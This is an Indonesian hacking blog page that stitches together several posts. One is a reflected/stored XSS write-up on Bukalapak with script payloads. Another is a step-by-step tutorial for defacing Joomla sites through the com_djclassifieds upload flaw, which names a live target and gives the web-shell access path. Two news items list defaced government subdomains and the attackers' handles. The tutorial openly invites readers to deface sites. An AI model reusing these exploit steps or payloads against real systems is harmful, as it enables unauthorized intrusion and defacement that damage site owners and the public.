[BUKA BONTY] XSS Vulnerability in Bukalapak

XSS Vulnerability in Edit Pelanggan

[BUKA BOUNTY]

Kembali Lagi Dengan Saya Camong Ganss vooos:v

Dah Lama Gan ga open Bug Bounty hehe

Karena apa? You Know lah :v Sibuk voos:v

Langsung Aja Ke TKP Ga Pake Lama :v

Salah satu situs Jual beli Online Yg memiliki Alamat situs https://m.bukalapak.com terdapat Bug Reflected XSS

Poc : 

Vulnerability in edit pelanggan

Langkah Pertama kalian Buka situs https://m.bukalapak.com Yg belum login silahkan kalian Login dulu karna di sini saya sudah login jadi saya tinggal langsung ke tkp hehe :v klik menu Yg ada di gambar bawah ini :

Setelah itu Maka tampilannya akan seperti ini : 

Lalu Kalian Klik Menu yang di garis Hitam kan (Mitra Bukalapak) Setelah Di Klik Tampilanya Akan Seperti Ini : 

Lalu Kalian Tinggal +Tambah Pelanggan Saja Karena di Sini saya sudah Menambahkan pelanggan Tingga Saya edit/Ubah namanya Saja Menjadi Payload XSS .

Setelah itu tinggal msukkan Payload saja di nama pelanggan, Payload yang saya gunakan seperti ini :

<script>alert(document.domain)</script>

 Lalu Klik Simpan Dan Tampilannya Akan Sepertin Ini :

Saya Mencoba Payload Ke Dua : 

<script>prompt('XSS By Camong')</script>

Lalu Tampilannya Akan Seperti Ini :

Kita test menggunakan payload lain, misalnya :

<center><table height="400" width="400"> <td align="center"> <img class="getar" height="250" src="https://garudatersakti72.id/img/gt72.jpg"/> <b><i><br><font size="5" color=red>XSS by Garuda tersakti 72</font></br>

DONE :D

Kenapa gak di report? Sudah ko, tapi gak valid dengan alasan tidak bisa diexploitasi lebih lanjut, jadi ini hanya untuk pembelajaran saja, tidak bermaksud untuk menggurui hehehe,

Oh ya Btw Nanti w Open Bug Bouny Lagi ya tunggu aja Jangan kemana mana di blog ini hehe :v

Jangan lupa Subscribe, Like, dan Share Blog ini, agar tidak ketinggalan Artikel terbaru yaa Guyss :D

Refrensi : Thanks To Ardyan 

Related Posts:

---

Rayakan Idul Fitri, Hacker Retas Situs KPU Kabupaten Sumbawa Barat

Berita-Internetku - "Rayakan Idul Fitri, Hacker Retas Situs KPU Kabupaten Sumbawa Barat".

Beberapa saat lalu sempat dihebohkan dengan team hacker yang mengatasnamakan "Banyumas Cyber Team" yang meretas 23 Subdomain Kabupaten Nagekeo, sekarang giliran hacker yang memiliki codename Nurmala dari team W3LL SQUAD meretas Situs KPU Kabupaten Sumbawa Barat.

• Baca Juga:
• "Banyumas Cyber Team" Babat 23 Subdomain Kabupaten Nagekeo
• Situs BAWASLU Kabupaten Klaten di Jahili Hacker
• 25 Subdomain Kota Banjarmasin di Hack Mr.Bean 

Saat membuka Situs KPU Kabupaten Sumbawa Barat yang memiliki alamat http://kpu-sumbawabaratkab.go.id/-.htm kita akan mendapatkan halaman berbackground putih dengan banner seperti dibawah ini:

Pelaku juga meninggalkan sederet codename yang sepertinya adalah member official dari team W3LL SQUAD seperti:

George74 | /4MN3SI4\ | BLACK BART 06 | SUMO IRENG | INTECT_ | Depars | FALKA | LC523 | Z0y0n3-cripzGangs | XnD0yZshHH | Shinta17 | ./R4D1AN | Lollz | Osvn7 | N00B T3RS4KITI | Mr.BOTLINE | Nurmala | ./LUL404 | SYNON_ | Aurora-X | Mr.Maniz | AliXploit  | ./FoxHaxor404 | Dex0ne | BabyGirl | D4rkside | Hex4core | SIM4NI522 | Satiya24

Sampai saat berita ini diterbitkan, Situs KPU Kabupaten Sumbawa Barat masih dalam keadaan diretas dan belum ada perbaikan dari pihak pengelola website.
Namun jika situs tersebut sudah kembali pulih kalian bisa melihat mirrornya di:

• https://hackersid.com/mirror/66954

Semoga saja kasus peretasan ini tidak mengganggu kinerja dari website tersebut.
Sekian untuk berita hari ini, salam olahraga.

Related Posts:

---

DEFACE Joomla com_djclassifieds UPSHELL

Assalamualaikum Wr.Wb
Kembali lagi Bersama Saya RUTH72_
Kali Ini saya akan memberi Sedikit Turtorial 

Ok Kita Langsung Ke Tutorial Nya aja ya hehe :v

Bahan-bahan :

Dork: inurl:=com_djclassifieds 

        ( Use your brain )

Exploit :

index.php?option=com_djclassifieds&task=upload&tmpl=component

Live Target : http://grupoposgar.es/

Csrf  type " file " > DISINI :D

Step by step :

1 . dorking menggukan dork dia atas , karena saya punya live target , ikutti saja step by step .

2 . jangan lupa masukkan exploit nya .

http://grupoposgar.es/index.php?option=com_djclassifieds&task=upload&tmpl=component

3 . jika vlun ada tulisan , seperti gambar di bawah .

Notice: Undefined variable: contentType in /homepages/41/d603710153/htdocs/Posgar_2/administrator/components/com_djclassifieds/lib/djupload.php on line 320

{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

4 . gunakan csrf nya dan upload file .

5 jika berhasil berhasil kembali ke tulisan vlun pertama / {"jsonrpc" : "2.0", "result" : null, "id" : "id"}

DONE

Akses Shell:

http://website.site/tmp/djupload/namafile.phtml/PhP

Note: ext harus phtml dan PhP

Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian

Jangan Lupa Di Share ya :)

Kalo Mau Daface, Saya nitip nick :v RUTH72_ Dan Nama Team nya Juga GARUDA TERSAKTI 72

Happy Deface ^_^

Enjoy Your Live :')

note:
HANYA UNTUK BERBAGI, PENYALAHGUNAAN BUKAN TANGGUNGJAWAB KAMI :)
DAN BUKAN BERMAKSUD UNTUK MENGGURUI~

Tag : hacking, Tutorial

Related Posts:

---

"Banyumas Cyber Team" Babat 23 Subdomain Kabupaten Nagekeo

Berita-Internetku - "Banyumas Cyber Team Babat 23 Subdomain Kabupaten Nagekeo".

Setelah beberapa saat lalu hacker dengan codename ./MrTahuSumedang meretas Situs BAWASLU Kabupaten Klaten, sekarang giliran hacker dengan codename Rex4 dari Banyumas Cyber Team meretas 23 Subdomain Kabupaten Nagekeo yang memiliki domain utama nagekeokab.go.id.

• Baca Juga:
• Situs BAWASLU Kabupaten Klaten di Jahili Hacker
• 25 Subdomain Kota Banjarmasin di Hack Mr.Bean 
• 26 Subdomain Kota Bekasi di Babat Hacker 

Pelaku meninggalkan pesan dan juga beberapa nickname pada halaman yang diretas, seperti:

-=[ BANYUMAS CYBER TEAM ]=-
BERSAMA KITA KOMPAK ORA NGAPAK ORA KEPENAK

[ Mr4NGG3R ][ HijaberS ][ Miss Proxy ][ GayAnon ][ M3ND0W4N ][ MR.W4HYU ][ Ghz7 ][ #Dropper_Sinx ][ Mr.Vi ]
[ CyberClay.go.id ][ Lian ][ Lala ' Ceper ][ Mr.TxT ][ RoboSkyJr ][ WhiteSystem404 ][ Mr.FBSN404][ Alv!@n ][ Noniod7 ]
[ R.R4M4DH4N ][ Riski@Misteriz ][ NisaStar7 ][ Miss Rex4 ][ AryaPow_Xploiter ]

[ Greetz ]
[ Indo}{ploit ][ N45HT ][ Phantom Ghost ][ Indonesian Code Party ][ TKJ Cyber Art ]
[ D704T ][ Defacer Tersakiti Team ][ EldersC0de Family ]

Indonesian Hacker Rulez

Pelaku juga meninggalkan twitter yang sepertinya adalah akun twitter dari hacker tsb.

• https://twitter.com/iam_rex4

Untuk ke-23 subdomain yang diretas kalian bisa melihatnya dibawah ini:

• http://admpemb.nagekeokab.go.id/bandung.htm 
• http://bappeda.nagekeokab.go.id/bandung.htm 
• http://bkeuda.nagekeokab.go.id/bandung.htm 
• http://blh.nagekeokab.go.id/bandung.htm 
• http://bpmd.nagekeokab.go.id/bandung.htm 
• http://dinasppo.nagekeokab.go.id/bandung.htm 
• http://dinkes.nagekeokab.go.id/bandung.htm 
• http://dinsos.nagekeokab.go.id/bandung.htm 
• http://dishubkominfo.nagekeokab.go.id/bandung.htm 
• http://dishut.nagekeokab.go.id/bandung.htm 
• http://dppkad.nagekeokab.go.id/bandung.htm 
• http://dukcapil.nagekeokab.go.id/bandung.htm 
• http://jdih.nagekeokab.go.id/bandung.htm 
• http://lpse.nagekeokab.go.id/bandung.htm 
• http://polpp.nagekeokab.go.id/bandung.htm 
• http://inspektorat.nagekeokab.go.id/bandung.htm 
• http://satudata.nagekeokab.go.id/bandung.htm 
• http://simpeg.nagekeokab.go.id/bandung.htm 
• http://rsdaeramo.nagekeokab.go.id/bandung.htm 
• http://ppid.nagekeokab.go.id/bandung.htm 
• http://kpu.nagekeokab.go.id/bandung.htm 
• http://belanjamodal.nagekeokab.go.id/bandung.htm 
• http://bappelitbangda.nagekeokab.go.id/bandung.htm

Sampai saat berita ini ditulis, ke-25 subdomain tersebut masih diretas dan belum ada perbaikan. Namun jika sudah kembali pulih, kalian bisa melihat mirrornya di:

• https://hackersid.com/archive/notifier/rex4

Sekian berita hari ini, salam olahraga.

Related Posts:

---